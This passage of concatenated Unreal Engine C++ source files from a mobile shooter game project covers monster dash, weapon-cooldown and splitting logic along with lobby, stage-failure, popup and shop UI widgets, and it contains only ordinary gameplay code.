false;\n\t\t\tGetWorldTimerManager().SetTimer(HandleWeaponCoolTime, this, &APG_MonCharSkillType::OnEndWeaponFireCoolTime, MonsterSkillTypeData.MWeaponCoolTime, false, MonsterSkillTypeData.MWeaponCoolTime);\n\t\t}\n\t}\n\n\tif (DashComponent)\n\t{\n\t\tm_bEquipDash = (MonsterSkillTypeData.MDashCoolTime > 0 && MonsterSkillTypeData.MDashMoveDistance > 0 && MonsterSkillTypeData.MDashSpeed > 0);\n\t\tif (m_bEquipDash)\n\t\t{\n\t\t\tDashComponent->OnDashEnd.AddUObject(this, &APG_MonCharSkillType::OnEndDash);\n\t\t\t// 스테이지 시작시 플레이어가 몬스터 사정권에 있으면 바로 몬스터가 대시하므로,\n\t\t\t// 난이도 밸런스를 위해 시작시 스킬 쿨타임을 바로 적용한다.\n\t\t\tm_bCanDash = false;\n\t\t\tGetWorldTimerManager().SetTimer(HandleDashCoolTime, this, &APG_MonCharSkillType::OnEndDashCoolTime, MonsterSkillTypeData.MDashCoolTime, false, MonsterSkillTypeData.MDashCoolTime);\n\t\t}\n\t}\n}\n\nvoid APG_MonCharSkillType::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tMonsterSkillTypeData.MRemainDivisionCount = MonsterSkillTypeData.MDivisionCount;\n\tMonsterData = &MonsterSkillTypeData;\n}\n\nvoid APG_MonCharSkillType::Destroyed()\n{\n\tGetWorldTimerManager().ClearTimer(HandleWeaponCoolTime);\n\tGetWorldTimerManager().ClearTimer(HandleDashDelayTime);\n\tGetWorldTimerManager().ClearTimer(HandleDashTime);\n\tGetWorldTimerManager().ClearTimer(HandleDashCoolTime);\n\n\tif (WeaponComponent)\n\t\tWeaponComponent->OnDestroy();\n\n\tSuper::Destroyed();\n}\n\nvoid APG_MonCharSkillType::OnHitCallback(UPrimitiveComponent* HitComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit)\n{\n\tauto pBlockingVolume = Cast<ABlockingVolume>(OtherActor);\n\tauto pMonChar = Cast<APG_MonChar>(OtherActor);\n\tif (pBlockingVolume || pMonChar)\n\t{\n\t\tm_bOnHitBlocking = true;\n\t\t//FString DebugMsg(TEXT(\"Call\"));\n\t\t//GEngine->AddOnScreenDebugMessage(-1, .1f, FColor::Yellow, DebugMsg);\n\t}\n}\n\nvoid APG_MonCharSkillType::UpdateWeaponSystem()\n{\n\tif (nullptr == WeaponComponent)\n\t\treturn;\n\n\tif (m_bCanWeaponFire)\n\t{\n\t\tif (FindTargetToMyCharForWeapon())\n\t\t{\n\t\t\tm_bCanWeaponFire = false;\n\t\t\tABCHECK(0 < MonsterSkillTypeData.MWeaponCoolTime);\n\t\t\t\t\t\t\n\t\t\tFireWeapon();\n\n\t\t\tGetWorldTimerManager().SetTimer(HandleWeaponCoolTime, this, &APG_MonCharSkillType::OnEndWeaponFireCoolTime, MonsterSkillTypeData.MWeaponCoolTime, false, MonsterSkillTypeData.MWeaponCoolTime);\n\t\t}\n\t}\n\telse\n\t{\n\t\tif (WeaponComponent->IsEquipWeapon())\n\t\t\tWeaponComponent->StopFire();\n\t}\n}\n\nvoid APG_MonCharSkillType::UpdateDashSystem()\n{\n\tif (nullptr == DashComponent)\n\t\treturn;\n\n\tif (m_bCanDash)\n\t{\n\t\tFVector vTarget;\n\t\tif (FindTargetToMyCharForDash(vTarget))\n\t\t{\n\t\t\tm_bCanDash = false;\n\t\t\tDash(vTarget);\n\t\t}\n\t}\n\n\t// 장애물에 부딪히면 대쉬를 멈추게 한다.\n\tif (DashComponent->IsDash() && m_bOnHitBlocking)\n\t{\n\t\tDashComponent->StopDash();\n\t\t//FString DebugMsg(TEXT(\"Stop Dash\"));\n\t\t//GEngine->AddOnScreenDebugMessage(-1, 1.0f, FColor::Yellow, DebugMsg);\n\t}\n}\n\nvoid APG_MonCharSkillType::FireWeapon()\n{\n\tABCHECK(nullptr != WeaponComponent);\n\tWeaponComponent->Fire();\n}\n\nvoid APG_MonCharSkillType::Dash(FVector vTarget)\n{\n\tABCHECK(nullptr != DashComponent);\n\n\tif (false == DashComponent->IsDash())\n\t{\n\t\t// 몬스터 AI 이동을 정지시키고 대쉬 이동 방향을 vTarget으로 설정한 후\n\t\t// MonsterSkillTypeData.MDashReadyTime 만큼 대기하였다가 대쉬한다.\n\t\tif (DashComponent->SetupDashData(vTarget, MonsterSkillTypeData.MDashMoveDistance, MonsterSkillTypeData.MDashSpeed))\n\t\t{\n\t\t\tm_bDoNotRotation = true;\n\n\t\t\tStopAI();\n\n\t\t\tPreviewMeshComponent->SetVisibility(true);\n\t\t\tPreviewMeshComponent->SetRelativeScale3D(FVector(1.0f, GetDashDistaceScale(), 1.0f));\n\t\t\tGetWorldTimerManager().SetTimer(HandleDashDelayTime, this, &APG_MonCharSkillType::OnStartDash, MonsterSkillTypeData.MDashReadyTime, false, MonsterSkillTypeData.MDashReadyTime);\n\t\t}\n\t}\n}\n\nfloat APG_MonCharSkillType::GetDashDistaceScale()\n{\n\tABCHECK(nullptr != PreviewMeshComponent->GetStaticMesh(), 0.0f);\n\n\t// MDashMoveDistance : 1000\n\tFBoxSphereBounds MeshBounds = PreviewMeshComponent->GetStaticMesh()->GetBounds();\n\n\tfloat fReturn = (MonsterSkillTypeData.MDashMoveDistance / MeshBounds.BoxExtent.X) / 2;\n\treturn fReturn;\n}\n\nvoid APG_MonCharSkillType::SetMonsterDataDivision(FPGMonsterData_SkillType& MonsterData_SkillType)\n{\n\tMonsterSkillTypeData = MonsterData_SkillType;\n}\n\nbool APG_MonCharSkillType::IsPossibleToDivision()\n{\n\tif (0 >= MonsterSkillTypeData.MRemainDivisionCount || 0 >= MonsterSkillTypeData.MDivisionCount)\n\t\treturn false;\n\n\t// 분열 대역\n\tfloat fPossibleToDivions_HPRatio = (1.0f / (MonsterSkillTypeData.MDivisionCount + 1)) * MonsterSkillTypeData.MRemainDivisionCount;\n\treturn (GetHPRatio() < fPossibleToDivions_HPRatio);\n}\n\nint32 APG_MonCharSkillType::GetDivisionCountToHPRatio()\n{\n\tif (MonsterSkillTypeData.MRemainDivisionCount <= 0 || 0.0f >= GetHPRatio())\n\t\treturn 0;\n\n\tfloat fActiveHPRatio = 1.0f / (MonsterSkillTypeData.MDivisionCount + 1);\n\treturn (int32)(GetHPRatio() / fActiveHPRatio);\n}\n\nbool APG_MonCharSkillType::FindTargetToMyCharForWeapon()\n{\n\tauto AMyChar = GetWorld()->GetFirstPlayerController()->GetCharacter();\n\tif (AMyChar)\n\t{\n\t\tfloat fDistance = FMath::Abs<float>(FVector::Distance(AMyChar->GetActorLocation(), GetActorLocation()));\n\t\tif (fDistance <= WeaponComponent->GetAttackRange())\n\t\t\treturn true;\n\t}\n\n\treturn false;\n}\n\nbool APG_MonCharSkillType::FindTargetToMyCharForDash(FVector& vGetTargetPos)\n{\n\tauto AMyChar = GetWorld()->GetFirstPlayerController()->GetCharacter();\n\tif (AMyChar)\n\t{\n\t\tfloat fDistance = FMath::Abs<float>(FVector::Distance(AMyChar->GetActorLocation(), GetActorLocation()));\n\t\tif (fDistance <= MonsterSkillTypeData.MDetectRange)\n\t\t{\n\t\t\tvGetTargetPos = AMyChar->GetActorLocation();\n\t\t\treturn true;\n\t\t}\n\t}\n\n\treturn false;\n}\n\nbool APG_MonCharSkillType::OnDamage(int32 nDamage, bool IsUseLetharAttack)\n{\n\tbool bIsDie = Super::OnDamage(nDamage, IsUseLetharAttack);\n\tif (false == bIsDie && IsPossibleToDivision())\n\t{\n\t\tif (0 < MonsterSkillTypeData.MRemainDivisionCount)\n\t\t{\n\t\t\tFVector vRange(MonsterSkillTypeData.MDivisionSpawnRange, MonsterSkillTypeData.MDivisionSpawnRange, 0.0f);\n\t\t\tif (DivisionSpawnComponent)\n\t\t\t\tDivisionSpawnComponent->DivisionSpawnActor<APG_MonCharSkillType>(MonsterSkillTypeData.MDivisionAmount, vRange);\n\t\t}\n\n\t\tMonsterSkillTypeData.MRemainDivisionCount = GetDivisionCountToHPRatio();\n\t}\n\n\treturn bIsDie;\n}\n\nvoid APG_MonCharSkillType::OnEndWeaponFireCoolTime()\n{\n\tm_bCanWeaponFire = true;\n}\n\nvoid APG_MonCharSkillType::OnStartDash()\n{\n\tABCHECK(nullptr != DashComponent);\n\t\n\tm_bOnHitBlocking = false;\n\n\tDashComponent->StartDash();\n\tPreviewMeshComponent->SetVisibility(false);\n\n\t// 임시코드\n\t//GetWorldTimerManager().SetTimer(HandleDashTime, this, &APG_MonCharSkillType::OnEndDash, 1.0f, false, 1.0f);\n}\n\nvoid APG_MonCharSkillType::OnEndDash()\n{\n\tABCHECK(nullptr != DashComponent);\n\n\tif (DashComponent->IsDash())\n\t\tDashComponent->StopDash();\n\n\tm_bDoNotRotation = false;\n\n\tRunAI();\n\n\tGetWorldTimerManager().SetTimer(HandleDashCoolTime, this, &APG_MonCharSkillType::OnEndDashCoolTime, MonsterSkillTypeData.MDashCoolTime, false, MonsterSkillTypeData.MDashCoolTime);\n\n\t//FString DebugMsg(TEXT(\"Dash End\"));\n\t//GEngine->AddOnScreenDebugMessage(-1, 1.0f, FColor::Yellow, DebugMsg);\n}\n\nvoid APG_MonCharSkillType::OnEndDashCoolTime()\n{\n\tm_bCanDash = true;\n}\n\nvoid APG_MonCharSkillType::OnSpawnActor(APG_MonCharSkillType* ASpawnActor)\n{\n\tABCHECK(nullptr != ASpawnActor);\n\n\tFPGMonsterData_SkillType MakeMonsterData_SkillType = MonsterSkillTypeData;\n\tMakeMonsterData_SkillType.MRemainDivisionCount = GetDivisionCountToHPRatio();\n\n\tASpawnActor->SetMonsterDataDivision(MakeMonsterData_SkillType);\n\tASpawnActor->SetHP(MakeMonsterData_SkillType.MHP);\n}" }, { "alpha_fraction": 0.7956318259239197, "alphanum_fraction": 0.7956318259239197, "avg_line_length": 25.70833396911621, "blob_id": "a00b82dd940790aa3c09a5a9f052346f2f4f7b5c", "content_id": "720da4af98a8da7e0bb034cf3332f1d859e61d58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 643, "license_type": "no_license", "max_line_length": 79, "num_lines": 24, "path": "/Source/Project_Gun/Private/Character/PG_MonCharDivisionSkillType.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_MonCharDivisionSkillType.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/Component/PG_ComponentDivisionSpawn.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"AI/PG_AICon_Mon.h\"\n\nAPG_MonCharDivisionSkillType::APG_MonCharDivisionSkillType()\n{\n\tAIControllerClass = APG_AICon_Mon::StaticClass();\n}\n\nvoid APG_MonCharDivisionSkillType::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nvoid APG_MonCharDivisionSkillType::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tMonsterData = &MonsterDivisionSkillTypeData;\n}\n" }, { "alpha_fraction": 0.7971014380455017, "alphanum_fraction": 0.7971014380455017, "avg_line_length": 38.03947448730469, "blob_id": "1a09240fc68e83dfdca27bf57725723a8dc6d2be", "content_id": "27fbac38df16c6b843c57feb286ba8a782a5da15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2969, "license_type": "no_license", "max_line_length": 159, "num_lines": 76, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetStageFailed.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetStageFailed.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n\n#include <Components/Overlay.h>\n\nvoid UPG_UserWidgetStageFailed::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\tOverlay_ActiveFlag = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveFlag\")));\n\tABCHECK(nullptr != Overlay_ActiveFlag);\n\tOverlay_DeActiveFlag = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveFlag\")));\n\tABCHECK(nullptr != Overlay_DeActiveFlag);\n\tOverlay_ActiveTime = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveTime\")));\n\tABCHECK(nullptr != Overlay_ActiveTime);\n\tOverlay_DeActiveTime = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveTime\")));\n\tABCHECK(nullptr != Overlay_DeActiveTime);\n\tOverlay_ActiveLethal = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveLethal\")));\n\tABCHECK(nullptr != Overlay_ActiveLethal);\n\tOverlay_DeActiveLethal = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveLethal\")));\n\tABCHECK(nullptr != Overlay_DeActiveLethal);\n}\n\nbool UPG_UserWidgetStageFailed::IsAbleViewStagePlayAD()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\treturn pGameInstance->IsAbleADView(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetStageFailed::UpdateClearStageLayout()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tbool bIsClearAmount = pGameModeStage->IsClearMission(EStageClearType::eSCT_AmountKill) || pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_AmountKill);\n\tOverlay_ActiveFlag->SetIsEnabled(bIsClearAmount);\n\tOverlay_DeActiveFlag->SetIsEnabled(!bIsClearAmount);\n\n\tbool bIsClearTime = pGameModeStage->IsClearMission(EStageClearType::eSCT_ClearTime) || pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_ClearTime);\n\tOverlay_ActiveTime->SetIsEnabled(bIsClearTime);\n\tOverlay_DeActiveTime->SetIsEnabled(!bIsClearTime);\n\n\tbool bIsClearLethal = pGameModeStage->IsClearMission(EStageClearType::eSCT_Lethal) || pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_Lethal);\n\tOverlay_ActiveLethal->SetIsEnabled(bIsClearLethal);\n\tOverlay_DeActiveLethal->SetIsEnabled(!bIsClearLethal);\n}\n\nvoid UPG_UserWidgetStageFailed::OnBtnRetry()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->RestartGame();\n}\n\nvoid UPG_UserWidgetStageFailed::OnBtnGoToMainLobby()\n{\n\tUGameplayStatics::OpenLevel(GetWorld(), TEXT(\"/Game/PG/Maps/Lobby/MainLobby\"));\n}\n\nvoid UPG_UserWidgetStageFailed::OnADPlayStageVideoSucessed()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetStageFailed::OnADPlayStageVideoClosed()\n{\n\n}\n" }, { "alpha_fraction": 0.7842105031013489, "alphanum_fraction": 0.7877193093299866, "avg_line_length": 20.923076629638672, "blob_id": "e18a3ee7ea9562dd2fbc71122c3a8685baa4d7f1", "content_id": "9ec48a91918e3ff9c5d8505fb0b4c0bac0bb9732", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1142, "license_type": "no_license", "max_line_length": 79, "num_lines": 52, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetMessagePopup.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetMessagePopup.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetMessagePopup : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tvirtual void SetVisibility(ESlateVisibility InVisibility) override;\n\npublic:\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetTitle(FString kTitle);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetDescription(FString kDescription);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetValue(int32 nValue);\n\t\npublic :\n\tFOnBtnClickedOK OnBtnClickedOK;\n\tFOnBtnClickedOK_OneValue OnBtnClickedOK_OneValue;\n\nprotected:\n\tUFUNCTION()\n\tvoid OnBtnOK();\n\nprotected :\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UTextBlock* Text_TitleName;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UTextBlock* Text_Description;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UButton* Btn_OK;\n\n\tUPROPERTY(EditAnywhere, Category = \"PG Sound\")\n\tclass USoundBase* PopupPlaySound = nullptr;\n\n\tint32 m_nValue = PG_INVALID_INDEX;\n};\n" }, { "alpha_fraction": 0.7760210633277893, "alphanum_fraction": 0.779241681098938, "avg_line_length": 35.32978820800781, "blob_id": "7b3bbe83c3c93aaf111482509848626632d4b34a", "content_id": "774a6a7c1f0754273750b25adfffe582247400ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6865, "license_type": "no_license", "max_line_length": 110, "num_lines": 188, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetMainLobby.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetMainLobby.h\"\n#include \"UI/PG_UserWidgetWeaponBox.h\"\n#include \"UI/PG_UserWidgetWeaponInventory.h\"\n#include \"Game/GameMode/PG_GameModeMainLobby.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\n#include <Components/Overlay.h>\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetMainLobby::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\t// Overlay Stars earned\n\tOverlay_ActiveFlag = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveFlag\")));\n\tABCHECK(nullptr != Overlay_ActiveFlag);\n\tOverlay_DeActiveFlag = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveFlag\")));\n\tABCHECK(nullptr != Overlay_DeActiveFlag);\n\tOverlay_ActiveTime = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveTime\")));\n\tABCHECK(nullptr != Overlay_ActiveTime);\n\tOverlay_DeActiveTime = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveTime\")));\n\tABCHECK(nullptr != Overlay_DeActiveTime);\n\tOverlay_ActiveLethal = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveLethal\")));\n\tABCHECK(nullptr != Overlay_ActiveLethal);\n\tOverlay_DeActiveLethal = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveLethal\")));\n\tABCHECK(nullptr != Overlay_DeActiveLethal);\n\n\tABCHECK(nullptr != Text_FlagValue);\n\tABCHECK(nullptr != Text_TimeValue);\n\tABCHECK(nullptr != Text_LethalValue);\n\n\tfor (int32 nIndex = 0; nIndex < PG_MAX_WEAPON_SLOT; ++nIndex)\n\t{\n\t\tFString BtnWidgetName = FString::Printf(TEXT(\"WB_WeaponBox_%d\"), nIndex);\n\t\tauto pBtnWeapon = Cast<UPG_UserWidgetWeaponBox>(GetWidgetFromName(*BtnWidgetName));\n\t\tABCHECK(nullptr != pBtnWeapon);\n\n\t\tpBtnWeapon->SetEnable(false);\n\t\tpBtnWeapon->SetSlotIndex(nIndex);\n\t\tpBtnWeapon->OnBtnWeaponClicked_SlotIndex.AddUObject(this, &UPG_UserWidgetMainLobby::OnBtnClickedWeaponSlot);\n\t}\n\n\tABCHECK(nullptr != WB_WeaponInventory);\n\tWB_WeaponInventory->OnBtnClickedClose.AddUObject(this, &UPG_UserWidgetMainLobby::OnCloseWeaponInventory);\n}\n\nFString UPG_UserWidgetMainLobby::GetSelectedStageName()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby, TEXT(\"NONE\"));\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, TEXT(\"NONE\"));\n\n\tint32 nSelectedStageID = pGameModeMainLobby->GetPlayStageID();\n\tconst FPGStageData* cpStageData = pGameInstance->GetTableStageData(nSelectedStageID);\n\tif (cpStageData)\n\t\treturn cpStageData->StageName;\n\n\treturn TEXT(\"NONE\");\n}\n\nvoid UPG_UserWidgetMainLobby::UpdateClearStageLayout()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tint32 nSelectedStageID = pGameModeMainLobby->GetPlayStageID();\n\tconst FPGStageData* cpStageData = pGameInstance->GetTableStageData(nSelectedStageID);\n\tABCHECK(nullptr != cpStageData);\n\n\tbool bIsClearAmount = pGameModeMainLobby->IsClearMission(EStageClearType::eSCT_AmountKill);\n\tOverlay_ActiveFlag->SetIsEnabled(bIsClearAmount);\n\tOverlay_DeActiveFlag->SetIsEnabled(!bIsClearAmount);\n\tText_FlagValue->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), cpStageData->M_Amount)));\n\n\tbool bIsClearTime = pGameModeMainLobby->IsClearMission(EStageClearType::eSCT_ClearTime);\n\tOverlay_ActiveTime->SetIsEnabled(bIsClearTime);\n\tOverlay_DeActiveTime->SetIsEnabled(!bIsClearTime);\n\tText_TimeValue->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), cpStageData->Time)));\n\n\tbool bIsClearLethal = pGameModeMainLobby->IsClearMission(EStageClearType::eSCT_Lethal);\n\tOverlay_ActiveLethal->SetIsEnabled(bIsClearLethal);\n\tOverlay_DeActiveLethal->SetIsEnabled(!bIsClearLethal);\n\tText_LethalValue->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), cpStageData->Multi_Kill)));\n}\n\nvoid UPG_UserWidgetMainLobby::UpdateWeaponSlotLayout()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tauto pSavePlayerData = pGameModeMainLobby->GetSavePlayerData();\n\tABCHECK(nullptr != pSavePlayerData);\n\n\tABCHECK(nullptr != WB_WeaponInventory);\n\t\n\tfor (int32 nIndex = 0; nIndex < PG_MAX_WEAPON_SLOT; ++nIndex)\n\t{\n\t\tFString BtnWidgetName = FString::Printf(TEXT(\"WB_WeaponBox_%d\"), nIndex);\n\t\tauto pBtnWeapon = Cast<UPG_UserWidgetWeaponBox>(GetWidgetFromName(*BtnWidgetName));\n\t\tif (nullptr == pBtnWeapon)\n\t\t{\n\t\t\tABLOG(Error, TEXT(\"Can't find UserWidgetWeaponBox (Index : %d)\"), nIndex);\n\t\t\tcontinue;\n\t\t}\n\n\t\tpBtnWeapon->SetWeaponIndex(pGameModeMainLobby, pSavePlayerData->m_kEquipWeaponTableIndex[nIndex]);\n\n\t\tif (PG_MAX_WEAPON_SLOT - 1 == nIndex)\n\t\t\tpBtnWeapon->SetEnable(pSavePlayerData->m_bExtendWeaponSlot);\n\t\telse\n\t\t\tpBtnWeapon->SetEnable(true);\n\t}\n}\n\nvoid UPG_UserWidgetMainLobby::AllHideIconOpenSlot()\n{\n\tfor (int32 nIndex = 0; nIndex < PG_MAX_WEAPON_SLOT; ++nIndex)\n\t{\n\t\tSetEnableIconOpenSlot(nIndex, false);\n\t}\n}\n\nvoid UPG_UserWidgetMainLobby::SetEnableIconOpenSlot(int32 nSlotIndex, bool bEnable)\n{\n\tFString kSlotName = FString::Printf(TEXT(\"OpenSlot_%d\"), nSlotIndex);\n\tauto BtnWeaponSlot = Cast<UOverlay>(GetWidgetFromName(*kSlotName));\n\tABCHECK(nullptr != BtnWeaponSlot);\n\n\tif (bEnable)\n\t\tBtnWeaponSlot->SetVisibility(ESlateVisibility::HitTestInvisible);\n\telse\n\t\tBtnWeaponSlot->SetVisibility(ESlateVisibility::Hidden);\n}\n\nbool UPG_UserWidgetMainLobby::OnNextSelectStage()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby, false);\n\n\treturn pGameModeMainLobby->SetNextStageID();\n}\n\nbool UPG_UserWidgetMainLobby::OnPrevSelectStage()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby, false);\n\n\treturn pGameModeMainLobby->SetPrevStageID();\n}\n\nvoid UPG_UserWidgetMainLobby::OnBtnClickedWeaponSlot(int32 nSlotIndex)\n{\n\tABCHECK(nullptr != WB_WeaponInventory);\n\n\tAllHideIconOpenSlot();\n\tSetEnableIconOpenSlot(nSlotIndex, true);\n\n\t// 인벤토리 창을 연다.\n\tWB_WeaponInventory->SetOpenSlotIndex(nSlotIndex);\n\tWB_WeaponInventory->SetVisibility(ESlateVisibility::Visible);\n\tWB_WeaponInventory->UpdateWeaponInventory();\n}\n\nvoid UPG_UserWidgetMainLobby::OnCloseWeaponInventory(int32 nSlotIndex, int32 nWeaponIndex)\n{\n\t// 인벤토리 창이 닫힘\n\tABCHECK(nullptr != WB_WeaponInventory);\n\tWB_WeaponInventory->SetVisibility(ESlateVisibility::Hidden);\n\tAllHideIconOpenSlot();\n\n\tif (PG_INVALID_INDEX != nWeaponIndex)\n\t{\n\t\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\t\tABCHECK(nullptr != pGameModeMainLobby);\n\t\tpGameModeMainLobby->SaveWeaponEquipSlot(nSlotIndex, nWeaponIndex);\n\n\t\tUpdateWeaponSlotLayout();\n\t}\n}\n\n" }, { "alpha_fraction": 0.7744373679161072, "alphanum_fraction": 0.7772925496101379, "avg_line_length": 29.538461685180664, "blob_id": "6b3197e2a9d79fac58a04a4e70efcd0731b3b76e", "content_id": "83b926a54eff90a2030d70e623b8b46c1eb528b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6022, "license_type": "no_license", "max_line_length": 217, "num_lines": 195, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetScreenShop.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetScreenShop.h\"\n#include \"UI/PG_UserWidgetSkillSlot.h\"\n#include \"UI/PG_UserWidgetShopWeaponSlot.h\"\n#include \"UI/PG_UserWidgetMainLobby_Renewal.h\"\n#include \"UI/PG_UserWidgetMessagePopup.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeMainLobby.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetScreenShop::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tPG_WIDGET_LINK(UButton, BtnGotoLobby);\n\tPG_WIDGET_LINK(UButton, BtnADView);\n\tPG_WIDGET_LINK(UTextBlock, TextADRemainTime);\n\tPG_WIDGET_LINK_TArray(UPG_UserWidgetSkillSlot, WB_SkillSlot, eMaxLethalShopItemSlot);\n\tPG_WIDGET_LINK_TArray(UPG_UserWidgetShopWeaponSlot, WB_ShopWeaponSlot, eMaxWeaponShopItemSlot);\n\n\tfor (auto ShopWeaponSlot : m_pkWB_ShopWeaponSlot)\n\t{\n\t\tif (ShopWeaponSlot)\n\t\t\tShopWeaponSlot->OnItemBuyWeapon.AddUObject(this, &UPG_UserWidgetScreenShop::UpdateRewardPoint);\n\t}\n\n\t{\n\t\tm_pUserWidgetMessagePopup = CreateWidget<UPG_UserWidgetMessagePopup>(GetWorld(), LoadClass<UPG_UserWidgetMessagePopup>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_MessagePopup.WB_MessagePopup_C'\")));\n\t\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\n\t\tm_pUserWidgetMessagePopup->OnBtnClickedOK.AddUObject(this, &UPG_UserWidgetScreenShop::OnMessagePopupBoxClose);\n\t\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pUserWidgetMessagePopup->AddToViewport(999);\n\t}\n}\n\nvoid UPG_UserWidgetScreenShop::NativeTick(const FGeometry& MyGeometry, float DeltaTime)\n{\n\tSuper::NativeTick(MyGeometry, DeltaTime);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tint32 